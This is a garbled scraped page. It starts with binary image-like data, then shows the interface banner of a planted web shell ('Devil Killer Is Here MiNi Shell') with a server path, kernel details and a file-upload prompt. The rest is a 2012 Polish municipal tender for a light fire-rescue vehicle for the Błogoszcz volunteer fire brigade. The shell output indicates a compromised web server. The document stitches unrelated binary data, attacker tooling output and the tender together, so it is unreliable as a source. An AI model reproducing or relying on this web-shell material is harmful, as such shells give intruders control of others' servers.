JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121005/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121005/384040-N-2012.html

<p class="kh_header"><b>Siedlce: Zakup lekkiego samochodu ratowniczo - gaśniczego 
dla OSP w Błogoszczy</b><br>
<b>Numer ogłoszenia: 384040 - 2012; data zamieszczenia: 05.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Siedlce , ul. Asłanowicza 10, 08-110 Siedlce, woj. mazowieckie, tel. 25 633 25 40 wew. 56, faks 25 6323630.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminasiedlce.pl     www.siedlcegw.e-bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup lekkiego samochodu ratowniczo - gaśniczego 
dla OSP w Błogoszczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia.
 Parametry techniczno - użytkowe dla nowego lekkiego samochodu ratowniczo-gaśniczego z modułem gaśniczym ze zbiornikiem wodnym i na środek pianotwórczy  na podwoziu z napędem 4 x 4:
1.Pojazd musi spełniać warunki techniczne określone ustawą Prawo o ruchu drogowym (Dz. U. Nr 98 z 2007 r. z późn. zm.) oraz spełniać wymagania zawarte w Rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz za?kresu ich niezbędnego wyposażenia (Dz. U. z 2003 r. Nr 32, poz. 262 z późn. zm.) oraz przepisami wykonawczymi do w w ustawy, potwierdzone świadectwem homologacji lub odpisem decyzji zwalniającej pojazdy z homologacji.
2.Posiada oznakowanie zgodne z załącznikiem Nr 1 do Zarządzenia Nr 1 Komendanta Głównego Państwowej Straży Pożarnej z dnia 10 kwietnia 2008 r. w sprawie gospodarki transportowej w jednostkach organizacyjnych Państwowej Straży Pożarnej - dane do oznakowania przekażą odbiorcy w trakcie realizacji zamówienia.
3.Spełnia wymagania określone w Rozporządzeniu Ministrów: Spraw Wewnętrznych 
i Administracji, Obrony Narodowej, Finansów, oraz Sprawiedliwości z dnia 24 listopada 2004r. w sprawie warunków technicznych pojazdów specjalnych i pojazdów używanych do celów specjalnych policji, agencji bezpieczeństwa wewnętrznego, agencji wywiadu, straży granicznej, kontroli skarbowej, służby celnej, służby więziennej i straży pożarnej (Dz. U. z 2004r. Nr 262, poz. 2615). 
4.Wymagania Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U. z 2007 nr 143, poz. 1002).

Wymagania dla lekkiego samochodu ratowniczo - gaśniczego na podwoziu z napędem 4x4 o DMC do 3,5 T dla OSP w Błogoszczy:

MINIMALNE WYMAGANIA TECHNICZNE	1. Wymagania ogólne:	
1.1	Aktualne świadectwo homologacji	
1.2	Aktualne świadectwo dopuszczenia wydane przez CNBOP (wymagany w chwili odbioru samochodu).	
1.3	Pojazd wyposażony, co najmniej w: zestaw narzędzi, klucz do kół, podnośnik hydrauliczny, trójkąt ostrzegawczy, apteczkę, gaśnicę samochodową 2 kg.	
1.4	Wymagany minimalny okres gwarancji:
a) na elementy mechaniczne:  24 miesiące,
b) na lakier:  24 miesiące,
c) na perforację nadwozia: 60 miesięcy.	
2. Podwozie:	
2.1	Pojazd fabrycznie nowy, nie starszy niż 2012 r., spełniające wymagania polskich przepisów prawa o ruchu drogowym, warunków technicznych z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych	
2.2Pojazd posiadający świadectwo dopuszczenia wydane w oparciu o rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz.U. z 2007 r. Nr 143, poz. 1002).
2.3Pojazd musi być wyposażony w urządzenie sygnalizacyjno-ostrzegawcze, akustyczne i świetlne pojazdu uprzywilejowanego: 
-belka z napisem STRAŻ płaska z lampami sygnalizacyjnymi LED umieszczona na dachu kabiny,
-jedna lampa sygnalizacyjna LED umieszczona na ścianie tylnej pojazdu lub tylnej części dachu pojazdu; 
-dodatkowo dwie lampy sygnalizacyjne niebieskie LED z przodu pojazdu zamontowane na wysokości grilla pojazdu,
-generator dźwięków generujący minimum trzy rodzaje sygnałów dźwiękowych używanych w pojazdach specjalnych o różnych brzmieniach + dodatkowy sygnał tzw. Horn,
-mikrofon do podawania komunikatów głosowych wbudowany w manipulator, możliwość sterowania światłami specjalnymi oraz sterowanie urządzeniami zewnętrznymi dodatkowymi takimi jak światła megaflesz czy lampy zespolone oraz posiada szybkie uruchamianie dźwięku syreny ręcznej w klaksonie pojazdu,
-urządzenie akustyczne powinno umożliwić podawanie komunikatów słownych i powinno być wyposażone w głośnik o mocy minimum 100 W. 
Urządzenie sygnalizacyjno - ostrzegawcze (belka) zabezpieczona przed mechanicznymi uszkodzeniami osłoną nie zakłócającą pola świecenia lamp.
Szczegóły dotyczące wykonania sygnalizacji oferent uzgodni z wybranym przez siebie wykonawcą i zamawiającym.	
2.4.Silnik powinien spełniać normę emisji spalin min. EURO V. Nie zezwala się na spełnienie wymogu normy emisji spalin EURO V przy stosowaniu dodatkowych płynów eksploatacyjnych. 	
2.5	Pojazd fabrycznie nowy, silnik i podwozie pochodzące od tego samego producenta	
2.6	Masa całkowita pojazdu gotowego do akcji ratowniczo-gaśniczej (pojazd z załogą, pełnymi zbiornikami, zabudowa i wyposażenie) nie może przekraczać 3500 kg.	
2.7	Układ napędowy 4x4 z układem bezpieczeństwa ABS lub równoważny.
2.8	Wylot spalin nie jest skierowany na stanowiska obsługi poszczególnych urządzeń pojazdu. 	
2.9	Ogumienie uniwersalne, z bieżnikiem dostosowanym do warunków terenowych. Pełno wymiarowe koło zapasowe do stałego przewożenia w pojeździe. 2.10	Wszystkie funkcje użytkowe pojazdu muszą być zapewnione w warunkach temperatury zewnętrznej w przedziale -25oC ÷ +35oC	
2.11	Kabina fabrycznie jednomodułowa czterodrzwiowa dostarczona z podwoziem, zapewniająca dostęp do silnika, w układzie miejsc 1+1+3 lub 1+2+3. 
2.12	Kabina z siedzeniami przodem do kierunku jazdy wyposażona w:
-	indywidualne oświetlenie nad siedzeniem dowódcy i załogi
-	fabryczną automatyczną instalację klimatyzacyjną kabiny,
-	niezależny układ ogrzewania i wentylacji kabiny działający niezależnie od silnika pojazdu,
-	sygnalizacja otwartych skrytek w kabinie kierowcy,
-	radiotelefon zamontowany w miejscu wskazanym przez Odbiorcę wraz z in?stalacją antenową,
-	manipulator sterowania sygnalizacją świetlną i dźwiękową zamontowany w miejscu wskazanym przez Odbiorcę.
-	ładowarka radiotelefonów przenośnych,
-	radioodtwarzacz z możliwością odtwarzania utworów w formacie mp3 i minimum 2 głośniki plus minimum 2 głośniki w przedziale pasażerskim. 	
2.13	Wszystkie fotele wyposażone w bezwładnościowe pasy bezpieczeństwa:
-	siedzenia odporne na rozdarcie i ścieranie pokryte materiałem łatwo zmywalnym wysokiej jakości,
-	wszystkie fotele wyposażone w zagłówki,
-	fotel dla kierowcy z regulacją wysokości, odległości i kąta pochylenia oparcia.	
2.14	Moc alternatora (min) i pojemność akumulatorów musi zapewnić pełne zapotrzebowanie na energię elektryczną przy jej maksymalnym obciążeniu	
2.15	Instalacja elektryczna wyposażona w główny wyłącznik prądu, bez odłączania urządzeń, które wymagają stałego zasilania (np. łado?warki latarek i radiotelefony). 
Zabezpieczenie przed nadmiernym rozłado?waniem akumulatorów. Dodatkowo zainstalowany wyłącznik ładowarek latarek oraz ra?diotelefonów.	
2.16	Instalacja elektryczna wyposażona w gniazdo oraz wtyczkę do ładowania akumulatorów ze źródła zewnętrznego (sygnalizacja podłączenia do zewnętrznego źródła zasilania w kabi?nie kierowcy lub złącze samorozłączalne - kpl.). Oświetlenie przedziału pasażerskiego włączane z kabiny kierowcy i niezależnie z przedziału pasażerskiego.	
2.17	Sygnalizacja świetlna i dźwiękowa włączonego biegu wstecznego, jako sygnalizację świetlną dopuszcza się światło cofania.	
2.18	Kolor:
-	elementy podwozia - czarne
-	błotniki i zderzaki - białe	
-	kabina, zabudowa (z wyłączeniem drzwi żaluzjowych) - RAL 3000
Pojazd powinien być oznakowany w numery operacyjne zgodne z wytycznymi KG PSP. Szczegóły dotyczące wykonania oznakowania oferent uzgodni z zamawiającym. Numer operacyjny zostanie podany w trakcie realizacji zamówienia. 
Podwozie zabezpieczone przed korozją.	
2.19	Na zewnątrz po stronie dowódcy zamontowany reflektor pogorzeliskowy
3. Zabudowa pożarnicza:	
3.2	Zabudowa wykonana z materiałów odpornych na korozję lub trwale zabezpieczona an?tykorozyjnie.	
3.2	Dach zabudowy w formie podestu roboczego w wykonaniu antypoślizgowym o konstrukcji wytrzymującej obciążenie masą dwóch strażaków i przewożonego sprzętu. Na dachu przygotowane mocowania dla trzech drabin nasadkowych DN 2,7 zgodnych z PN-EN 1147, 2 tłumic i 2 węży ssawnych. Miejsce na wyposażenie należy uzgodnić z Odbiorcą.
Dach pojazdu powinien posiadać światło robocze składające się z min. dwóch źródeł światła na przeciwległych krawędziach zapewniających oświetlenie o natężeniu światła min. 5 lx w poziomej płaszczyźnie dachu w porze nocnej.	
3.3	Drabina umożliwiająca dostanie się na dach pojazdu, stopnie drabinki antypoślizgowe, dodatkowo poręcze zaokrąglone w stronę dachu.	
3.4	Skrytki na sprzęt i wyposażenie zamykane żaluzjami w układzie 2+2+1 wodo i pyłoszczelnymi wspomaganymi systemem sprężynowym, wykonane z materiałów odpornych na korozję, wyposażone w zamki zamykane na klucz (klucz ten musi pasować do wszystkich zamknięć żalu?zjowych).	
3.5	Oświetlenia skrytek włączane z kabiny kierowcy i niezależnie z przedziału sprzętowego.	
3.6	Konstrukcja skrytek zapewniająca odprowadzanie z wnętrza wody.
3.7	Powierzchnie platform i podłogi kabiny w wykonaniu antypoślizgowym
3.8	Półki z regulowaną wysokością zapewniające miejsca na wyposażenie samochodu wynikające z tabeli nr I-4 Wymagań dla samochodów ratowniczo-gaśniczych i samochodów ratownictwa technicznego przeznaczonych dla Ochotniczych Straży Pożarnych - Edycja druga - marzec 2006- w ilości środków specjalnych ochrony strażaka dostosowanych do ilości osób załogi. Miejsce na wyposażenie należy uzgodnić z Odbiorcą	
3.9	Pojazd powinien posiadać światło robocze składające się z zespołu lamp Hella typu Work Lights (lub równoważnych), zabezpieczonych przed uszkodzeniem, zapewniają?cych oświetlenie o natężeniu światła min. 5 lx w odległości od 0-5m od ścian bocznych i tylnej ściany samochodu w porze nocnej. Do?datkowo pojazd należy wyposażyć we włącz?nik oświetlenia zewnętrznego zainstalowany w kabinie kierowcy.	
3.10	Półki z regulowaną wysokością zapewniające miejsca na wyposażenie samochodu wynikające z tabeli nr I-4 Wymagań dla samochodów ratowniczo-gaśniczych i samochodów ratownictwa technicznego przeznaczonych dla Ochotniczych Straży Pożarnych - Edycja druga - marzec 2006 - w ilości środków specjalnych ochrony strażaka dostosowanych do ilości osób załogi. Miejsce na wyposażenie należy uzgodnić z Odbiorcą	
3.11	ładowarki latarek zamontowane w przedziale sprzętowym. Miejsce na ładowarki należy uzgodnić z Odbiorcą.	
4. Wyposażenie sprzętowe	
4.1Agregat Wysokociśnieniowy: 
- wydajność pompy min 60 l min, przy ciśnieniu 40 bar,
- silnik czterosuwowy,
- rozrusznik ręczny,
- linia szybkiego natarcia 40 mb za zwijadłem ręcznym,
-prądownica pistoletowa, z regulacją strumienia od mgłowego do zwartego,
-zbiornik wody o pojemności 300 litrów,
-zbiornik na środek pianotwórczy o pojemności 20 litrów.	
4.2	Maszt oświetleniowy o łącznej mocy lamp 2000W (2 x 1000W lub 4 x 500 W) zamocowany na stałe na pojeździe przystosowany do zasilania z agregatu prądotwórczego. Zasilanie systemu wysuwu masztu z instalacji elektrycznej samochodu.
Wysokość masztu po rozłożeniu od poziomu dachu do reflektora nie mniej niż 1,5 m powyżej dachu. Stopień ochrony masztu min. IP 55 (wg PN-92/E-08106).	
4.3	Agregat prądotwórczy o mocy 2000 W z możliwością pracy w układzie szeregowym	
4.4	Radiotelefon samochodowy z wyświetlaczem alfanumerycz?nym o parametrach:  min. 255 kanałów, pracujący w pa?śmie VHF 136-174 MHz o odstępie międzykanało?wym 12,5 kHz, dopuszczony do pracy w resorcie MSWiA, zainstalo?wany w kabinie kierowcy. Antena radiotelefonu tak zestro?jona i dopasowana by nie występowały zakłócenia przy włączonych urządzeniach elektrycznych tj. np. światła sy?gnalizacyjno-ostrzegawcze, akustyczne i świetlne (LED) po?jazdu uprzywilejowanego. 
Szczegóły dotyczące miejsca wykonania montażu radiosta?cji w kabinie oferent uzgodni z Odbierającym.	
4.5	2 radiotelefony nasobne (wraz ze stacją do ich ładowania zamontowaną na stałe w kabinie pojazdu oraz ładowarką stacjonarną) o parametrach: częstotliwość VHF 136-174 MHz, moc1÷25 W, odstęp międzykanałowy 12,5 kHz dostosowany do użytkowania w sieci MSWiA, min.255 kanałów, wyświetlacz alfanumeryczny min.14 znaków. Obrotowy potencjometr siły głosu.	
4.6	Ładowarki z latarkami LED w ilości 2 szt. 	
4.7	Przenośna lampa (szperacz) zasilana z gniazda zapalniczki 12V	
4.8	Przednie orurowanie zewnętrzne wzmacniające zderzak. Uchwyt pod wyciągarkę oraz wyciągarka elektryczna min. 3,5 T z liną o długości min 30 m
4.9	Pojazd wyposażony w zaczep holowniczy z gniazdem elektrycznym. Hak typu kulowego do holowania przyczepy o DMC zgodnie z homologacją podwozia (wg PN 76 S-47291). Gniazdo elektryczne do przyczepy znormalizowane 12V, 7 biegunowe (wg PN -83 S-76055). Zaczep posiadający homologację certyfikat dopuszczający do użytkowania.	.

Dopuszcza się indywidualne podejście do ilości i rodzaju wyposażenia wynikającego z Wymagań dla samochodów ratowniczo-gaśniczych i samochodów ratownictwa technicznego przeznaczonych dla Ochotniczych Straży Pożarnych - Edycja druga - marzec 2006 z uwagi na wymagania jednostki OSP. 

W załączniku do projektu umowy, tj. powyższej tabeli w pustych miejscach przy określonych parametrach należy wpisać czy oferowany pojazd je spełnia czy nie, w przypadku, kiedy oferowany samochód posiada wyższe parametry od wymaganych należy wpisać spełnia i w nawiasie je określić.

Do samochodu Wykonawca  zobowiązuje się dołączyć:
1)	wyciąg ze świadectwa homologacji podwozia,
2)	kartę pojazdu,
3)	instrukcje obsługi i konserwacji samochodu oraz wyposażenia w języku polskim,
4)	książki gwarancyjne samochodu oraz wyposażenia,
5)	i inne dokumenty potrzebne do rejestracji pojazdu;

Wykonawca przed odbiorem pojazdu prześle do Zamawiającego dokumenty potrzebne do zarejestrowania samochodu w celu wykonania powyższej czynności i dokonania odbioru już z tablicami rejestracyjnymi.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona w wadium w wysokości 3.800,00 zł (słownie: trzy tysiące osiemset złotych). Wadium może być wnoszone w formach wymienionych w ar. 45 ust. 6 ustawy Prawo zamówień publicznych.
Wadium musi obejmować okres związania ofertą, tj. 30 dni.
Termin wniesienia wadium upływa dnia  17.10.2012 r. o godz. 9:30
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank BPH S.A. Oddział Banku BPH S.A. ul. Starowiejska 6, 08-110 Siedlce nr 39 1060 00760000 3310 0019 3435 Urzędu Gminy Siedlce z dopiskiem: Wadium na dostawę lekkiego samochodu ratowniczo - gaśniczego dla OSP w Błogoszczy Wadium wnoszone w pieniądzu Zamawiający przechowuje na rachunku bankowym. Wniesienie wadium w pieniądzu będzie skuteczne jeżeli w podanym terminie zostanie zaksięgowane na  rachunku bankowym Zamawiającego.
Wadium wnoszone w innej formie niż pieniądze Wykonawca składa w oryginale wraz 
z ofertą w oddzielnej kopercie. Nie należy oryginału dokumentu wadialnego trwale łączyć z ofertą. 
Gwarancje ubezpieczeniowe lub gwarancje bankowe oraz poręczenia złożone jako zabezpieczenie wadium muszą posiadać okres ważności nie krótszy niż okres związania ofertą, (pod rygorem wykluczenia Wykonawcy z postępowania) oraz umożliwiać Zamawiającemu otrzymanie określonej kwoty wadium bez jakichkolwiek warunków i na jego pierwsze wezwanie</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 Ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 Ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi wykaz wykonanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy zostały wykonane należycie.
Sporządzony wykaz musi zawierać minimum dwie dostawy nowych, lekkich samochodów ratowniczo - gaśniczych 4×4 wraz z załączeniem referencji lub protokołów odbioru potwierdzających prawidłowość wykonanych dostaw</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę 100.000,00 zł wystawioną nie wcześniej niż  3 miesiące przed terminem składania ofert;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

